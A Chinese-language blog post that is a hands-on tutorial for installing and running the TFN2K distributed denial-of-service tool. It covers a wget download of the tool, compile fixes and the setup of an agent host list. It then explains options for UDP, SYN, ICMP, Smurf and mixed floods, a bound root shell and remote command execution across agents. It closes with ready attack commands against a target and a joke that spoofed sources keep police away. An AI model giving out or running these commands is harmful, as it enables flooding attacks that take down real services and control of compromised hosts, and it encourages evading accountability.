leed ga

ddos工具tfn2k安装与使用

2016-12-26 网络

首先下载tfn2k: http://7vzswb.com1.z0.glb.clouddn.com/tfn2k.tar

wget http://7vzswb.com1.z0.glb.clouddn.com/tfn2k.tar 
tar -xvf tfn2k.tar
cd tfn2k
/Makefile  README  src/
cd src
vi ip.h


 /*struct in_addr              { 

              unsigned long int s_addr;            };*/

这里内容注释掉,否则编译会有错误,发生重复定义。

cd src
make

y

最少八位的密码

strip tfn 编译完成

src下运行tb

./tb

新建一个代理文件,内容格式是

ip

ip

ip


touch ip.txt
echo "127.0.0.1" > ip.txt   /#把代理主机的ip写进去,这里用的是本机做代理,就写本地地址
cat ip.txt 查看是否写入成功
./tfn -f ip.txt  -c 5 -i 目标ip -p 目标端口   /运行

Password verification:

Sending out packets: . 


/tfn直接回车大家可以看到一些参数

-f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS   

-h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址

-p 后面指定一个端口,不用说了   

-c 最关键的参数,一共有11个选相   

 0 - 停止攻击,发善心用的

 1 - 反欺骗等级设定 ,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的,所以不用担心警察抓,哈哈    

 2 - 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。    

 3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。    

 4 - UDP洪水攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。    

 5 - SYN洪水攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击.    

 6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。    

 7 - SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。    

 8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮番轰炸    

 9 - TARGA3攻击    

 10 - 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:    

 ./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目录建立edison,-i后面跟"命令"

参数基本说完,下面攻击   

 ./tfn -f hostext -c 4 -i X.X.X.X    使用hostext文件中记录的主机对X.X.X.X服务器进行UDP攻击   
 ./tfn -f hostext -c 5 -i X.X.X.X -p XXXX    使用hostext文件中记录的主机对X.X.X.X服务器进行TCP拒绝服务攻击   
 ./tfn -f hostext -c 6 -i X.X.X.X    使用hostext文件中记录的主机对X.X.X.X服务器进行ICMP攻击 
 ./tfn -f hostext -c 8 -iX.X.X.X  使用hostext文件中记录的主机对X.X.X.X服务器进行ICMP&TCP&UDP轮番攻击


发表评论:

  • 0
  • 6
  • 5
  • 7

© CNM.EE SiteMap